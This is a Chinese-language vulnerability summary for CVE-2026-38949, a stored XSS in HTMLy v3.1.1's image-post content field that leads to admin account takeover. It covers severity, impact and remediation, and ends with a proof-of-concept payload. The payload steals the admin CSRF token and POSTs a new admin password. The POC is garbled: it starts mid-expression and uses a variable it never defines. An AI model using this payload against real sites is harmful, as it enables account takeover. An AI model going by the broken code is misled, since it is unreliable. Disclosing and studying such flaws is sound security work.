# CVE-2026-38949 总结 ## 漏洞概述 - **漏洞名称**:HTMLy v3.1.1 中的存储型跨站脚本(Stored XSS)漏洞,导致管理员账户接管。 - **漏洞类型**:存储型跨站脚本(Stored XSS) - **漏洞描述**:在HTMLy v3.1.1版本中,通过图像发布功能的内容字段注入恶意JavaScript代码。由于输入验证不当,恶意代码被存储并在管理员查看恶意帖子时执行。攻击者可以从管理员密码更改页面获取CSRF令牌,并执行认证请求以修改管理员凭据(如密码)。 - **严重程度**:8.9 High (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L) - **CVE ID**:CVE-2026-38949 - **受影响版本**:HTMLy v3.1.1 - **CWE ID**:CWE-79, CWE-352 ## 影响范围 - **受影响产品**:HTMLy v3.1.1 - **影响描述**:攻击者可以在管理员的认证浏览器会话中执行JavaScript代码,绕过CSRF保护,动态检索有效令牌。这导致管理员密码修改、完整管理员账户接管、持久未授权访问以及应用程序的完全控制。 ## 修复方案 - **修复建议**: - 对输入进行严格的验证和过滤,防止恶意代码注入。 - 实施有效的CSRF保护机制,确保请求的合法性。 - 定期更新软件版本,修补已知漏洞。 ## POC代码 ```html r.text()) .then(h=>{ let t=m.match(/name=\"csrf_token\" value=\"([^\"]+)\"/); fetch('/htmly/edit/password',{ method:'POST', credentials:'include', headers:{'Content-Type':'application/x-www-form-urlencoded'}, body:'csrf_token='+t[1]+'&username=admin&password=attacker' }); }); "> ``` ## 参考链接 - [GitHub Repository](https://github.com/danpros/htmly/) - [HTMLy Official Website](https://www.htmly.com/)